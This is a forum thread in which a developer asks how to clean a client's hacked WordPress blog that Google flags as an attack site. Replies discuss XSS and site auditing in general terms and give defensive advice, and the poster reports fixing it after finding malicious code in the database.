Hey, guys....

I got a call from a client this morning whose Wordpress blog now displays the big obnoxious red "Reported Attack Site" page.... the Google Safe Browsing page shows the following:



I've never dealt with a hacked site before. Where do I start? Is the problem going to be something added to my source code? Is it going to be a comment link from elsewhere? Is it going to be an uploaded image? Is there any way to know where the problem is going to be? And once the problem is eliminated, what steps do I need to take to get this site off the Google list?

Any help would be GREATLY appreciated!!

**Before I start, if any admins feel that this post has too much info in it (thinking of the site rules here) feel free to delete it and I'll PM my response instead**

I did a quick Google on the site name and managed to find a link for the admin (you?) detailing how you can resolve things from the Google end. View it here

As for the dealing with the actual downloads, it looks like something on the page may be redirecting the viewer to another domain which is downloading the content. There are tons of known ways of achieving this and probably many more that haven't been reported yet. One of the major ones is XSS - a process whereby poor coding allows a malicious user to "plant" nasty code on a site. Anyone who subsequently views the page triggers the code to execute. It's possible that someone has found such a hole and used it along with some sort of exploit (probably browser based) to download malicious code to the viewers machine.

I would start by looking for XSS vulnerable parts of the site - a little research on the net will yield some pretty detailed information on how it is achieved and should give you a decent understanding of where to look. If you get stuck at all, PM me and I'll send you some links.

If your familiar with them, using VM's can provide a great way to carry out tests on a site. Copy the site from the server, set up a LAMP server to host it on a VM network and connect another VM to it with a network analyzer running. Use a filter to flag traffic flowing from the two domains listed in the message from Google and then just browse the site as per normal.

This requires time - you don't know what browser the original "infectee" was using or what version or even how old the exploit is so you may have to try a few different versions of each browser (start with IE, then Firefox and move onto the others). If this is an XSS problem (it might not be remember), removing any and all end user added content **should** (no promises) resolve it. However, you'll still be left with the risk of it happening again as you won't know how they got in the first time.

To sum it up, you'll probably need to audit all of the user added content on the site at the very least. If you have any custom code on the site that should be a priority as well. The fix is usually simple, it's finding the problem that can be the hard part.

Hopefully, that will help you out some. I don't really want to post much more info because of the site rules regarding hacking topics so PM me if you have any more questions and I'll do my best to answer them.


-N

Thanks for your reply!

What the client and I have decided to do is backup the site content, do a complete wipe and a full clean Wordpress install - I figure that will be the best way to ensure there is nothing left of the problem.

Thanks again!

I'd find some way to blame the customer.

The issue has been fixed... after a clean install and some code searching, the malicious code turned out to be in the database. Passwords have been changed. Content has been removed. Threat has been eradicated. w00t!